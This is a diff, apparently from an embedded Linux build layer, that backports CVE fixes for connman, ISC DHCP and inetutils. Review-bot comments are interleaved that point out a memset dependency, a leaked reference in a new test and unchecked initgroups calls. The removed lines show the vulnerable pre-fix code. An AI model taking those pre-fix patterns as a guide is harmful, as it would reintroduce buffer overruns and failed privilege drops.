+Date: Tue, 11 Apr 2023 08:12:56 +0200
+Subject: gdhcp: Verify and sanitize packet length first
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
+CVE: CVE-2023-28488
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ gdhcp/client.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 7efa7e45..82017692 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
+ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ struct sockaddr_in *dst_addr)
+ {
+- int bytes;
+ struct ip_udp_dhcp_packet packet;
+ uint16_t check;
++ int bytes, tot_len;
+
+ memset(&packet, 0, sizeof(packet));
+
+@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ if (bytes < 0)
+ return -1;
+
+- if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
+- return -1;
+-
+- if (bytes < ntohs(packet.ip.tot_len))
++ tot_len = ntohs(packet.ip.tot_len);
++ if (bytes > tot_len) {
++ /* ignore any extra garbage bytes */
++ bytes = tot_len;
++ } else if (bytes < tot_len) {
+ /* packet is bigger than sizeof(packet), we did partial read */
+ return -1;
++ }
+
+- /* ignore any extra garbage bytes */
+- bytes = ntohs(packet.ip.tot_len);
++ if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
++ return -1;
+
+ if (!sanity_check(&packet, bytes))
+ return -1;
+--
+cgit
+
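Review bot: `packet.ip.tot_len` is now read before the check that `bytes` covers the IP and UDP headers, which is safe only because of the `memset(&packet, 0, sizeof(packet))` a few lines earlier. A short read leaves `tot_len` zero or partial, so either the function returns or `bytes` is clamped to it, and the size check that now comes last rejects the result. That dependency is easy to break in a later edit, so I would add a comment above the assignment, e.g. `/* packet is zeroed above; a short read yields a tot_len that the size check below rejects */`. The function body continues past the end of the hunk.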
diff --git a/meta/recipes-connectivity/connman/connman_1.37.bb b/meta/recipes-connectivity/connman/connman_1.37.bb
index 00852bf0d6..8062a094d3 100644
--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
file://connman \
file://no-version-scripts.patch \
+ file://CVE-2021-26675.patch \
+ file://CVE-2021-26676-0001.patch \
+ file://CVE-2021-26676-0002.patch \
+ file://CVE-2021-33833.patch \
+ file://CVE-2022-23096-7.patch \
+ file://CVE-2022-23098.patch \
+ file://CVE-2022-32292.patch \
+ file://CVE-2022-32293.patch \
+ file://CVE-2023-28488.patch \
"
SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
new file mode 100644
index 0000000000..91aaf83a77
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
+From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 8 Jul 2021 00:08:25 +0000
+Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
+ (CVE-2021-25217)
+
+On May 26, 2021, we (Internet Systems Consortium) disclosed a
+vulnerability affecting our ISC DHCP software:
+
+ CVE-2021-25217: A buffer overrun in lease file parsing code can be
+ used to exploit a common vulnerability shared by dhcpd and dhclient
+ https://kb.isc.org/docs/cve-2021-25217
+
+New versions of ISC DHCP are available from https://www.isc.org/downloads
+
+Operators and package maintainers who prefer to apply patches selectively can
+find individual vulnerability-specific patches in the "patches" subdirectory
+of the release directories for our two stable release branches (4.4 and 4.1-ESV)
+
+ https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
+ https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
+
+With the public announcement of this vulnerability, the embargo
+period is ended and any updated software packages that have been
+prepared may be released.
+
+Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
+CVE: CVE-2021-25217
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ common/parse.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/common/parse.c b/common/parse.c
+index 386a632..fc7b39c 100644
+--- a/common/parse.c
++++ b/common/parse.c
+@@ -3,7 +3,7 @@
+ Common parser code for dhcpd and dhclient. */
+
+ /*
+- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
++ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
+ * Copyright (c) 1995-2003 by Internet Software Consortium
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
+ skip_to_semi (cfile);
+ return 0;
+ }
+- convert_num (cfile, &buf [len], val, 16, 8);
+- if (len++ > max) {
++ if (len >= max) {
+ parse_warn (cfile,
+ "hexadecimal constant too long.");
+ skip_to_semi (cfile);
+ return 0;
+ }
++ convert_num (cfile, &buf [len], val, 16, 8);
++ len++;
+ token = peek_token (&val, (unsigned *)0, cfile);
+ if (token == COLON)
+ token = next_token (&val,
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
+From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:39:18 +0530
+Subject: [PATCH] CVE-2022-2928
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2928
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 7 +++++
+ common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+)
+
+diff --git a/common/options.c b/common/options.c
+index a7ed84c..4e53bb4 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
+ if (!option_cache_allocate(&oc, MDL)) {
+ log_error("No memory for option cache adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ return 0;
+ }
+
+@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
+ MDL)) {
+ log_error("No memory for constant data adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ option_cache_dereference(&oc, MDL);
+ return 0;
+ }
+@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
+ save_option(&dhcp_universe, options, oc);
+ option_cache_dereference(&oc, MDL);
+
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
++
+ return 1;
+ }
+
+diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
+index cd52cfb..690704d 100644
+--- a/common/tests/option_unittest.c
++++ b/common/tests/option_unittest.c
+@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
+ }
+
+
++ATF_TC(add_option_ref_cnt);
++
++ATF_TC_HEAD(add_option_ref_cnt, tc)
++{
++ atf_tc_set_md_var(tc, "descr",
++ "Verify add_option() does not leak option ref counts.");
++}
++
++ATF_TC_BODY(add_option_ref_cnt, tc)
++{
++ struct option_state *options = NULL;
++ struct option *option = NULL;
++ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
++ char *cid_str = "1234";
++ int refcnt_before = 0;
++
++ // Look up the option we're going to add.
++ initialize_common_option_spaces();
++ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
++ &cid_code, 0, MDL)) {
++ atf_tc_fail("cannot find option definition?");
++ }
++
++ // Get the option's reference count before we call add_options.
++ refcnt_before = option->refcnt;
++
++ // Allocate a option_state to which to add an option.
++ if (!option_state_allocate(&options, MDL)) {
++ atf_tc_fail("cannot allocat options state");
++ }
++
++ // Call add_option() to add the option to the option state.
++ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
++ atf_tc_fail("add_option returned 0");
++ }
++
++ // Verify that calling add_option() only adds 1 to the option ref count.
++ if (option->refcnt != (refcnt_before + 1)) {
++ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++
++ // Derefrence the option_state, this should reduce the ref count to
++ // it's starting value.
++ option_state_dereference(&options, MDL);
++
++ // Verify that dereferencing option_state restores option ref count.
++ if (option->refcnt != refcnt_before) {
++ atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++}
++
+ /* This macro defines main() method that will call specified
+ test cases. tp and simple_test_case names can be whatever you want
+ as long as it is a valid variable identifier. */
+@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
+ {
+ ATF_TP_ADD_TC(tp, option_refcnt);
+ ATF_TP_ADD_TC(tp, pretty_print_option);
++ ATF_TP_ADD_TC(tp, add_option_ref_cnt);
+
+ return (atf_no_error());
+ }
+--
+2.25.1
+
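Review bot: The added test add_option_ref_cnt never releases the reference it obtains itself from `option_code_hash_lookup(&option, ...)`. The comment added to add_option() in the same patch says the hash lookup creates a reference, so this test, which exists to catch leaked option references, leaves the count one above its value before the test ran. Ending the test body with `option_dereference(&option, MDL);` would restore it. Whether the other cases in option_unittest.c are sensitive to the count is not visible here.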
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
new file mode 100644
index 0000000000..d605204f89
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
+From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:42:59 +0530
+Subject: [PATCH] CVE-2022-2929
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2929
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/common/options.c b/common/options.c
+index 4e53bb4..28800fc 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
+ while (s < &bp -> data[0] + length + 2) {
+ len = *s;
+ if (len > 63) {
+- log_info ("fancy bits in fqdn option");
+- return 0;
++ log_info ("label length exceeds 63 in fqdn option");
++ goto bad;
+ }
+ if (len == 0) {
+ terminated = 1;
+ break;
+ }
+ if (s + len > &bp -> data [0] + length + 3) {
+- log_info ("fqdn tag longer than buffer");
+- return 0;
++ log_info ("fqdn label longer than buffer");
++ goto bad;
+ }
+
+ if (first_len == 0) {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
index b56a204821..d3c87d0d07 100644
--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
file://0013-fixup_use_libbind.patch \
file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
+ file://CVE-2021-25217.patch \
+ file://CVE-2022-2928.patch \
+ file://CVE-2022-2929.patch \
"
SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
new file mode 100644
index 0000000000..aea07bd803
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
+From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Date: Fri, 30 Jun 2023 19:02:45 +0200
+Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
+ set*id() return values
+
+Several setuid(), setgid(), seteuid() and setguid() return values
+were not checked in ftpd/rcp/rlogin/rsh/rshd/uucpd code potentially
+leading to potential security issues.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
+Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Signed-off-by: Simon Josefsson <simon@josefsson.org>
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ftpd/ftpd.c | 10 +++++++---
+ src/rcp.c | 39 +++++++++++++++++++++++++++++++++------
+ src/rlogin.c | 11 +++++++++--
+ src/rsh.c | 25 +++++++++++++++++++++----
+ src/rshd.c | 20 +++++++++++++++++---
+ src/uucpd.c | 15 +++++++++++++--
+ 6 files changed, 100 insertions(+), 20 deletions(-)
+
+diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
+index 5db88d0..b52b122 100644
+--- a/ftpd/ftpd.c
++++ b/ftpd/ftpd.c
+@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
+ char *remotehost = pcred->remotehost;
+ int atype = pcred->auth_type;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
++
+ if (pcred->logged_in)
+ {
+ logwtmp_keep_open (ttyline, "", "");
+@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
+
+ if (data >= 0)
+ return fdopen (data, mode);
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
+ if (s < 0)
+ goto bad;
+@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
+ else /* !AF_INET6 */
+ ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
+ {
+ if (seteuid ((uid_t) cred.uid))
+diff --git a/src/rcp.c b/src/rcp.c
+index bafa35f..366295c 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,14 +347,23 @@ main (int argc, char *argv[])
+ if (from_option)
+ { /* Follow "protocol", send data. */
+ response ();
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ source (argc, argv);
+ exit (errs);
+ }
+
+ if (to_option)
+ { /* Receive data. */
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ sink (argc, argv);
+ exit (errs);
+ }
+@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
+ if (response () < 0)
+ exit (EXIT_FAILURE);
+ free (bp);
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
+ ++errs;
+ continue;
+ }
+- seteuid (userid);
++
++ if (seteuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+ (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
+@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
+ #endif
+ vect[0] = target;
+ sink (1, vect);
+- seteuid (effuid);
++
++ if (seteuid (effuid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ close (rem);
+ rem = -1;
+ #ifdef SHISHI
+@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
+ return (127);
+
+ case 0:
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+ }
+diff --git a/src/rlogin.c b/src/rlogin.c
+index e5e11a7..6b38901 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -649,8 +649,15 @@ try_connect:
+ /* Now change to the real user ID. We have to be set-user-ID root
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index bd70372..b451a70 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,8 +278,17 @@ main (int argc, char **argv)
+ {
+ if (asrsh)
+ *argv = (char *) "rlogin";
+- seteuid (getuid ());
+- setuid (getuid ());
++
++ if (seteuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+ }
+@@ -543,8 +552,16 @@ try_connect:
+ error (0, errno, "setsockopt DEBUG (ignored)");
+ }
+
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+ sigaddset (&sigs, SIGINT);
+diff --git a/src/rshd.c b/src/rshd.c
+index b824a10..8cdcd06 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ pwd->pw_shell = PATH_BSHELL;
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+- setegid ((gid_t) pwd->pw_gid);
+- setgid ((gid_t) pwd->pw_gid);
++ if (setegid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
++ if (setgid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+ #endif
+@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ }
+ #endif /* WITH_PAM */
+
+- setuid ((uid_t) pwd->pw_uid);
++ if (setuid ((uid_t) pwd->pw_uid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 55c3d44..6aba294 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
+ sprintf (Username, "USER=%s", user);
+ sprintf (Logname, "LOGNAME=%s", user);
+ dologin (pw, sap, salen);
+- setgid (pw->pw_gid);
++
++ if (setgid (pw->pw_gid) == -1)
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
+ fprintf (stderr, "Login incorrect.");
+ return;
+ }
+- setuid (pw->pw_uid);
++
++ if (setuid (pw->pw_uid) == -1)
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
++
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
+ }
+--
+2.25.1
+
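Review bot: The `initgroups()` calls that sit between the newly checked `setgid()` and `setuid()` calls in `doit()` of src/rshd.c and src/uucpd.c still ignore their return value. If `initgroups()` fails, the process keeps the supplementary groups it was started with, so the command that runs afterwards can retain group privileges even though the uid and gid changes succeeded. I would fail closed there in the same style as the surrounding checks, as sketched below. Both `doit()` bodies start and end outside the hunks shown.

```c
/* src/rshd.c, doit() — … unchanged: setegid()/setgid() checks above … */
#ifdef HAVE_INITGROUPS
  if (initgroups (pwd->pw_name, pwd->pw_gid) == -1)	/* BSD groups */
    {
      rshd_error ("Cannot drop privileges (initgroups() failed)\n");
      exit (EXIT_FAILURE);
    }
#endif

/* src/uucpd.c, doit() — … unchanged: setgid() check above … */
#ifdef HAVE_INITGROUPS
  if (initgroups (pw->pw_name, pw->pw_gid) == -1)
    {
      fprintf (stderr, "initgroups() failed");
      return;
    }
#endif
```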
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
new file mode 100644
index 0000000000..4bc354d256
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
+From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Mon, 31 Jul 2023 13:59:05 +0200
+Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/rcp.c | 42 ++++++++++++++++++++++++------------------
+ src/rlogin.c | 12 ++++++------
+ src/rsh.c | 24 ++++++++++++------------
+ src/rshd.c | 24 ++++++++++++------------
+ src/uucpd.c | 16 ++++++++--------
+ 5 files changed, 62 insertions(+), 56 deletions(-)
+
+diff --git a/src/rcp.c b/src/rcp.c
+index cdcf8500..652f22e6 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,9 +347,10 @@ main (int argc, char *argv[])
+ response ();
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ source (argc, argv);
+ exit (errs);
+@@ -358,9 +359,10 @@ main (int argc, char *argv[])
+ if (to_option)
+ { /* Receive data. */
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ sink (argc, argv);
+ exit (errs);
+@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
+ free (bp);
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
+ }
+
+ if (seteuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
+ sink (1, vect);
+
+ if (seteuid (effuid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ close (rem);
+ rem = -1;
+@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
+
+ case 0:
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+diff --git a/src/rlogin.c b/src/rlogin.c
+index c543de0c..4360202f 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -648,14 +648,14 @@ try_connect:
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index 6f60667d..179b47cd 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,14 +278,14 @@ main (int argc, char **argv)
+ *argv = (char *) "rlogin";
+
+ if (seteuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+@@ -551,14 +551,14 @@ try_connect:
+ }
+
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+diff --git a/src/rshd.c b/src/rshd.c
+index 707790e7..3a153a18 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+ if (setegid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setegid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ if (setgid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setgid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ #endif /* WITH_PAM */
+
+ if (setuid ((uid_t) pwd->pw_uid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setuid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
